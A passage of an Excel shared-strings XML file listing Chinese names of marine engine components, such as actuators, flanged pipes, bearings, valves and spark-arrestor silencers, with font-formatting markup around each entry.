      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器活塞，外部</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器气缸</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器气缸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器试验设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>促动器总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>催化剂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>存油盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打孔直管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>打印机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大部件组装工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大尺寸法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大门</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>大门压块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰钢制软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰弯管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰钢制软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>法兰弯管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>BSP</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的前端布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>前端布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带安全阀的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带安全阀的曲轴箱盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带安装板的箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带把手盖，矩形</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带泵的细滤器，润滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带泵液压千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带臂毂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带标记的凸轮轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带标记的推进机械装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带测试阀的仪表盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带叉杆的侧板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带齿止动垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带冲击阀的顶盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带传感器的面板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带磁阀的流量调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带促动器的球阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带促动器阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带弹簧插头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带弹簧锁安全销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带导管的盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带导轨的隔栅走台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带导轨的隔栅走台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底座滚动轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底座滚动轴承，轴向</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底座滚针轴承，径向</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带底座滚珠轴承，径向</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带垫圈六方螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带蝶形衬套的阀锥体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带发电机齿轮箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰导向销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的短管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的锻造曲轴</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰的滑油管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰交流电机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰外壳滚动轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带法兰轴承，轴向</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带扶梯平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带辅助程序的继电器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带附件的空气起动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带附件的振动减振器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带钩环的链节头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带管漏斗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带滚轮轴承的滚轮导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带滚筒滚针轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带恒温阀泵出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带环的活塞和活塞销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带环园柱套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带活塞的顶盖</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带活塞环活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带火花制止器的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>25db</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带火花制止器的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>35db</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带火花制止器的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>45db</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带集成润滑系统的主机凸轮轴润滑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带加强筋特制活塞焊接程序</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带加热器的辅助鼓风机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带接头管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带节流孔的喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带紧配端的导销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带颈法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带开关的截止阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带刻度扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔管</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔弯管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔圆螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带孔值管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带离合器的输入轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带连杆的十字头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺母螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺栓的法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺栓的喷嘴环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹把手</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹的喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带螺纹吊钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
